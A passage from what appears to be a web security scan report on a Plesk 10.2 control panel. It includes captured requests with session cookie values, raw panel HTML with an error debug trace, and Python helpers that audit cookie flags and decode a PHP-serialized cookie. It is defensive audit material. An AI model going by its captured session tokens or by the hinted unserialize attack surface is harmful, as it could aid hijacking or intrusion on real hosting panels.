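    pos = colon + 2                           # skip ':{'
    result = {}
    for _ in range(count):
        key = read_scalar()
        result[key] = read_scalar()
    if data[pos:pos + 1] != "}":
        raise ValueError("trailing data after array")
    return result


def decode_filelist_cookie(value):
    """Return (raw serialized string, parsed dict) for the filelist cookie value."""
    raw = base64.b64decode(value).decode("ascii")
    return raw, php_unserialize_flat(raw)


if __name__ == "__main__":
    for f in audit_set_cookies(RESPONSE_HEADERS):
        print("%-12s missing=%s session-like=%s" % (f["name"], f["missing"], f["looks_like_session"]))
    raw, state = decode_filelist_cookie(parse_request_cookies(REQUEST_COOKIE_HEADER)["filelist"])
    print(raw)
    print(state)
```

Two caveats when reading the output. The flag check only applies to server-issued cookies: filelist is written by client-side JavaScript in the page body, and a cookie set that way can never be HttpOnly, so its absence from this finding is expected rather than a scanner miss. The decoded filelist value is list-view state (sort key, filter, page and page size) in PHP serialize() format; whether the server hands that client-controlled string to unserialize() is not shown on this page, so treat it as a follow-up question for review, not as a finding.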

Request

GET /plesk/client@2/domain@1/hosting/file-manager/view/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:58:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:58:37 GMT
Connection: close
Content-Length: 14922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Operation failed</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {
hideinfo_oC(document.forms[0]);
$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/unhandlederror/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function update_oC(f)
       {
           f.cmd.value="update";
           f.submit();
           return false;
       }
       function showinfo_oC(f)
       {
           if (document.getElementById) {
               var el = document.getElementById("bid-unhandlederror-showinfo");
               if (el) {
                   el.className = "hiddenElement";
               }
               var el = document.getElementById("bid-unhandlederror-hideinfo");
               if (el) {
                   el.className = "commonButton";
               var el = document.getElementById("errorArea");
               if (el) {
                   el.className = "formArea";
               }
               }
           }
           return false;
       }
       function hideinfo_oC(f)
       {
           if (document.getElementById) {
               var el = document.getElementById("bid-unhandlederror-hideinfo");
               if (el) {
                   el.className = "hiddenElement";
               }
               var el = document.getElementById("bid-unhandlederror-showinfo");
               if (el) {
                   el.className = "commonButton";
               }
               var el = document.getElementById("errorArea");
               if (el) {
                   el.className = "hiddenElement";
               }
           }
           return false;
       }
       function submitticket_oC(f)
       {
           f.cmd.value="submitticket";
           f.submit();
           return false;
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/view/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <style>
.hiddenElement {
display: none;
}
</style>

<div class="formArea">

<div><img src="/skins/default/plesk/icons/off.gif" width="16" height="16" align="absmiddle">&nbsp;The operation you were performing failed. You can retry the operation with or without changing its parameters. You may also want to report this problem to our support so that we could help you as soon as possible.</div>
<div class="formButtons">
   <table width="100%" cellspacing="0" cellpadding="0"><tr>
       <td align="left" width="0"><DIV class="commonButton" id="bid-unhandlederror-showinfo" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to view detailed information on the error.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return showinfo_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_unhandlederror_showinfo" id="buttonid-unhandlederror-showinfo" type="button" onClick="Event.stop(event);return showinfo_oC(document.forms[0]);return false;">Show Details</BUTTON><SPAN id="spanid-unhandlederror-showinfo">Show Details</SPAN></DIV><DIV class="commonButton" id="bid-unhandlederror-hideinfo" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide additional information on the error.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return hideinfo_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_unhandlederror_hideinfo" id="buttonid-unhandlederror-hideinfo" type="button" onClick="Event.stop(event);return hideinfo_oC(document.forms[0]);return false;">Hide Details</BUTTON><SPAN id="spanid-unhandlederror-hideinfo">Hide Details</SPAN></DIV></td>
       <td class="misc" width="0"><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/file-manager/&#039;); return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/file-manager/&#039;); return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV></td>
   </tr></table>
</div>


</div>
<div class="hiddenElement" id="errorArea">
<br>Additional Information<br><br>
   <textarea rows=20 name="description" readonly>
FileList::init() failed: ls_files_wrapper() failed: Unable to connect to pipe \\.\pipe\PSA_pipe &#123;110D2F0F-F073-4021-AB73-C7886FB9BD1E&#125;
---------------------- Debug Info -------------------------------
0: FileManagerUIPointer.php:726
   FileManagerUIPointer-&gt;accessItem(string &#039;GET&#039;, NULL null)
1: UIPointer.php:600
   UIPointer-&gt;access(string &#039;GET&#039;)
2: plesk.php:47
   </textarea>
</div>





</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.28. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/ftp-users/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/ftp-users/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: psaContext (Set-Cookie: psaContext=dashboard; path=/ in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. As in 5.27, the session cookie PLESKSESSID is only presented by the client here and is not set in this response, so this exchange says nothing about the flags on the session token itself.
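The check behind findings 5.27 and 5.28 is mechanical: parse every Set-Cookie header in a response and report the ones lacking HttpOnly (and, over TLS, Secure), rating the finding higher when the cookie looks like a session token. The following is an added example, not code from the XSS.CX report or from Plesk; the sample response is constructed from the headers shown on this page, and the session-token heuristic, the severity labels and the function names are this example's own assumptions.

```python
"""Audit Set-Cookie headers in a raw HTTP response for missing HttpOnly/Secure.

Added example (not part of the original XSS.CX report or Plesk code).
"""
import re
from dataclasses import dataclass, field

# Constructed sample: the header block of the finding 5.28 response, plus one
# hypothetical HttpOnly session cookie to show how a session token is treated.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "Set-Cookie: psaContext=dashboard; path=/\r\n"
    "Set-Cookie: PLESKSESSID=d92187f07d1a80c8d90db119609cd480; path=/; HttpOnly\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<html>...</html>"
)


@dataclass
class Cookie:
    name: str
    value: str
    attributes: dict = field(default_factory=dict)  # lower-cased attr -> value

    @property
    def httponly(self) -> bool:
        return "httponly" in self.attributes

    @property
    def secure(self) -> bool:
        return "secure" in self.attributes

    @property
    def looks_like_session_token(self) -> bool:
        # Heuristic (assumption): a conventional session name, or a long hex blob.
        if re.search(r"sess", self.name, re.I):
            return True
        return re.fullmatch(r"[0-9a-fA-F]{32,}", self.value) is not None


def parse_set_cookie(header_value: str) -> Cookie:
    """Split 'name=value; Attr; Attr=val' (RFC 6265 shape) into a Cookie."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return Cookie(name.strip(), value, attrs)


def cookies_from_response(raw: str) -> list:
    """Return a Cookie for every Set-Cookie header in a raw HTTP response."""
    head, _, _ = raw.partition("\r\n\r\n")
    cookies = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        key, sep, val = line.partition(":")
        if sep and key.strip().lower() == "set-cookie":
            cookies.append(parse_set_cookie(val.strip()))
    return cookies


def audit_cookies(raw: str, over_https: bool = False) -> list:
    """Return [(cookie_name, [problem, ...]), ...] for each Set-Cookie header.

    Missing HttpOnly is rated 'Low' for a session-looking cookie and
    'Information' otherwise, mirroring the severities used in this report.
    Secure is only demanded when the exchange happened over HTTPS.
    """
    findings = []
    for cookie in cookies_from_response(raw):
        problems = []
        if not cookie.httponly:
            severity = "Low" if cookie.looks_like_session_token else "Information"
            problems.append(f"{severity}: missing HttpOnly")
        if over_https and not cookie.secure:
            problems.append("Low: missing Secure")
        findings.append((cookie.name, problems))
    return findings


if __name__ == "__main__":
    for name, problems in audit_cookies(SAMPLE_RESPONSE):
        print(name, "->", problems or "ok")
```

Run it as-is and psaContext is reported as Information (no HttpOnly, not a session token) while the HttpOnly PLESKSESSID passes; pass `over_https=True` when the capture came over TLS and the missing Secure attribute is reported as well. The heuristic is deliberately simple; in a real review you still inspect what psaContext controls, as the finding text says.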

Request

GET /plesk/client@2/domain@1/hosting/ftp-users/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/view
Cookie: locale=en-US; psaContext=dashboard; PLESKSESSID=d92187f07d1a80c8d90db119609cd480

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:12:55 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:12:54 GMT
Connection: close
Content-Length: 22979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="ac96ec24fae152c446439f0afde39de7" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Management of additional FTP accounts under the domain <span class="name">nosedivesailing.com</span></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.hosting.ftp-users/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>

<div id="screenTabs"><div id="tabs"><ul><li class="first" id="current"><A href="/plesk/client@2/domain@1/hosting/ftp-users/" onClick=";lon();" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create additional FTP accounts for domain vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();"><span>Additional FTP Accounts</span></a></li><li class="last"><A href="/plesk/client@2/domain@1/hosting/anonymous-ftp/" onClick=";lon();" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Set up anonymous FTP on domain vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();"><span>Anonymous FTP</span></a></li></ul></div></div>
<form action="/plesk/client@2/domain@1/hosting/ftp-users/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="ac96ec24fae152c446439f0afde39de7">
   <input type="hidden" name="cmd" value="setFilter">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-ftp-user-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create an additional FTP account.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/ftp-users/ftp-user@new/properties/&#039;); return false;" style=""><BUTTON name="bname_ftp-user-add" id="buttonid-ftp-user-add" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/ftp-users/ftp-user@new/properties/&#039;); return false;">Create Additional FTP Account</BUTTON><SPAN id="spanid-ftp-user-add">Create Additional FTP Account</SPAN></DIV>
       </div>

   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>FTP accounts</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div id="FtpUsersListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><SPAN class="commonButton" id="bid-remove-selected-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Domain vulnerable.host.fqdn does not have any additional FTP accounts.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_remove_selected" disabled id="buttonid-remove-selected-disabled" type="button">Remove</BUTTON><SPAN id="spanid-remove-selected-disabled">Remove</SPAN></SPAN></div></td><td class="misc"><div id="FtpUsersListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FtpUsersListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FtpUsersListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FtpUsersListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FtpUsersListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" 